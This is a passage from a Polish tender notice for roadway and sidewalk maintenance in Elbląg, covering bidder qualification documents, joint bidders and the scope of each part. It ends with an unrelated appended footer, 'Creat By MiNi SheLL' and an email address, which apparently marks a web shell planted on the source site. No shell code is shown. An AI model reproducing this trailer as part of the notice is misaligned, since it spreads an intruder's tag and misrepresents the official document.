d)Rodzaj wykazanych robót należy podać z taką szczegółowością, która umożliwi Zamawiającemu sprawdzenie spełniania warunku określonego w sekcji III.3.2) ogłoszenia dla Części 1. zamówienia, tj. w rodzaju wykazanych robót należy podać:
-czy robota była zlokalizowana na obszarze zabudowanym,
-czy robota polegała na utrzymaniu nawierzchni pasów drogowych w zakresie remontów cząstkowych jezdni.
e)Obowiązek wskazania przez Wykonawcę w wykazie dotyczy robót budowlanych, polegających na wykonaniu robót zlokalizowanych w obszarze zabudowanym polegających na utrzymaniu nawierzchni pasów drogowych w zakresie remontów cząstkowych jezdni.
f)Dowody określające, czy roboty budowlane zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, należy złożyć tylko do wskazanych w wykazie robót budowlanych, o których mowa w sekcji III.3.2) ogłoszenia dla Części 1. zamówienia.
g)Wartości podane w walutach innych niż wskazane przez Zamawiającego należy przeliczyć wg średniego kursu NBP na dzień odbioru tych robót, podając datę i kurs.
h)W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku określonego w sekcji III.3.2) ogłoszenia dla Części 1. zamówienia. 
i)Wykonawca, który polega na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.  
3. Uwaga do dokumentu wymienionego w pkt VI. ppkt 1.3. SIWZ:
a)W kwalifikacjach zawodowych należy podać informację o posiadanych uprawnieniach do kierowania robotami drogowymi.
b)Wykaz należy sporządzić na druku zgodnie ze wzorem stanowiącym ZAŁĄCZNIK Nr 6 do SIWZ WYKAZ OSÓB dla Części 1. zamówienia.			
c)W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymieniony dokument Wykonawcy składają wspólnie.
d)Wykonawca, który polega na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
4. Uwaga do dokumentu wymienionego w pkt VI. ppkt 1.4. SIWZ:
a)W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie Wykonawcy składają wspólnie.
 b)Treść oświadczenia znajduje się na ZAŁĄCZNIKU NR 6 do SIWZ dla Części 1. zamówienia - Wykaz osób składany w postępowaniu na: Część 1 Bieżące utrzymanie jezdni na terenie miasta Elbląga. 
5. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wymienionych w pkt VI.1. SIWZ dla Części 1. zamówienia, metodą spełnia / nie spełnia.
Część 2. zamówienia: 
1. Uwaga do oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ:
a)Treść wymaganego Oświadczenia w zakresie art. 22 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przekazuje na ZAŁĄCZNIKU NR 2a do SIWZ. Oświadczenie należy składać w oryginale dla Części 2. zamówienia. 
b)W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane oświadczenie może być złożone przez pełnomocnika w imieniu wszystkich Wykonawców lub przez wszystkich Wykonawców na jednym dokumencie lub przez każdego Wykonawcę odrębnie (jeżeli każdy z Wykonawców spełnia warunki udziału samodzielnie).
2. Uwaga do dokumentu wymienionego w pkt VI. ppkt 1.2. SIWZ:
a)Dowodami, o których mowa powyżej są:
-poświadczenie, 
-inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.
b)W przypadku, gdy podmiotem na rzecz którego roboty budowlane wskazane w wykazie zostały wcześniej wykonane jest Gmina - Miasto Elbląg, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.
c)Wykaz należy sporządzić na druku zgodnie ze wzorem stanowiącym ZAŁĄCZNIK NR 5 do SIWZ WYKAZ ROBÓT dla Części 1. zamówienia. 
d)Rodzaj wykazanych robót należy podać z taką szczegółowością, która umożliwi Zamawiającemu sprawdzenie spełniania warunku określonego w sekcji III.3.2) ogłoszenia dla Części 2. zamówienia, tj. w rodzaju wykazanych robót należy podać: 
-czy robota była zlokalizowana na obszarze zabudowanym,
-czy robota polegała na utrzymaniu nawierzchni pasów drogowych w zakresie budowy, przebudowy lub remontów cząstkowych nawierzchni chodników.
e)Obowiązek wskazania przez Wykonawcę w wykazie dotyczy robót budowlanych, polegających na wykonaniu robót zlokalizowanych w obszarze zabudowanym polegających na utrzymaniu nawierzchni pasów drogowych w zakresie budowy, przebudowy lub remontu nawierzchni chodników.
f)Dowody określające, czy roboty budowlane zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, należy złożyć tylko do wskazanych w wykazie robót budowlanych, o których mowa w sekcji III.3.2) ogłoszenia dla Części 2. zamówienia.
g)Wartości podane w walutach innych niż wskazane przez Zamawiającego należy przeliczyć wg średniego kursu NBP na dzień odbioru tych robót, podając datę i kurs.
h)W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku określonego w sekcji III.3.2) ogłoszenia dla Części 2. zamówienia. 
i)Wykonawca, który polega na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
3. Uwaga do dokumentu wymienionego w pkt VI. ppkt 1.3. SIWZ:
a)W kwalifikacjach zawodowych należy podać informację o posiadanych uprawnieniach do kierowania robotami drogowymi. 
b)Wykaz należy sporządzić na druku zgodnie ze wzorem stanowiącym ZAŁĄCZNIK Nr 6 do SIWZ WYKAZ OSÓB dla Części 2. zamówienia.			
c)W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymieniony dokument Wykonawcy składają wspólnie.
d)Wykonawca, który polega na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
4. Uwaga do dokumentu wymienionego w pkt VI. ppkt 1.4. SIWZ:
a)W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie Wykonawcy składają wspólnie.
 b)Treść oświadczenia znajduje się na ZAŁĄCZNIKU NR 6 do SIWZ dla Części 2. zamówienia - Wykaz osób składany w postępowaniu na: Część 2 Bieżące utrzymanie chodników na terenie miasta Elbląga. 
5. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wymienionych w pkt VI.1. SIWZ dla Części 2. zamówienia, metodą spełnia / nie spełnia.
Część 1. zamówienia i Część 2. zamówienia
6.  Uwaga do oświadczenia wymienionego w pkt VI.A. ppkt 1. SIWZ:
a)Treść wymaganego Oświadczenia Zamawiający przekazuje na ZAŁĄCZNIKU NR 2b do SIWZ.
b)W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
7. Uwaga do dokumentu wymienionego w pkt VI.A. ppkt 2. SIWZ:
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
8.Uwaga do dokumentu wymienionego w pkt VI.A. ppkt 3. SIWZ:
a)W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
b)Informację o przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Prawo zamówień publicznych należy złożyć zgodnie ze wzorem stanowiącym ZAŁĄCZNIK NR 4 do SIWZ.
9.Dotyczy Sekcji III.4.3) Dokumenty podmiotów zagranicznych:
Jeżeli w kraju miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w sekcji III.4.3.1) ogłoszenia, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Dokumenty, o których mowa powyżej, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
10. Opłata za SIWZ obejmuje koszty jej druku oraz przekazania.
11. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń  wymienionych w pkt VI.1. SIWZ, metodą spełnia / nie spełnia.
12. Warunki udziału, o których mowa w art. 22 ust. 1 ustawy oraz opis sposobu dokonania oceny ich spełniania mają na celu zweryfikowanie zdolności wykonawcy do należytego wykonania udzielanego zamówienia.
UWAGA: 
Zgodnie z art. 26 ust. 2b ustawy Prawo zamówień publicznych Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Bieżące utrzymanie jezdni na terenie miasta Elbląga.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia Części 1. obejmuje: 
1. remonty cząstkowe nawierzchni jezdni:
1.1.bitumicznych: mieszankami mineralno-asfaltowymi na gorąco, mieszankami bitumicznymi na zimno,
1.2. betonowych i kamiennych (materiał Zamawiającego): z kostki brukowej betonowej, płyt ażurowych, płyt drogowych betonowych, kostki kamiennej,
1.3.betonowych i kamiennych (materiał nowy): z kostki brukowej betonowej, płyt ażurowych, płyt drogowych betonowych, kostki kamiennej,
1.4. tłuczniowej,
1.5. brukowcowej,
2. remonty cząstkowe elementów ulic (materiał Zamawiającego): krawężniki, obrzeża,
3. remonty cząstkowe elementów ulic (materiał nowy): krawężniki, obrzeża,
4. naprawa nawierzchni gruntowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.41-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Bieżące utrzymanie chodników na terenie miasta Elbląga.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia Części 2. obejmuje remonty cząstkowe:  
1.nawierzchni chodników betonowych (materiał Zamawiającego): z płyt betonowych 35x35x5 cm, płyt betonowych 50x50x7 cm, kostki brukowej betonowej, 
2. nawierzchni chodników betonowych (materiał nowy): z płyt betonowych 35x35x5 cm, płyt betonowych 50x50x7 cm, kostki brukowej betonowej, 
3. polegające na regulacji urządzeń infrastruktury technicznej,
4. elementów ulic (materiał Zamawiającego): krawężniki, obrzeża,
5. elementów ulic (materiał nowy): krawężniki, obrzeża..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.41-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com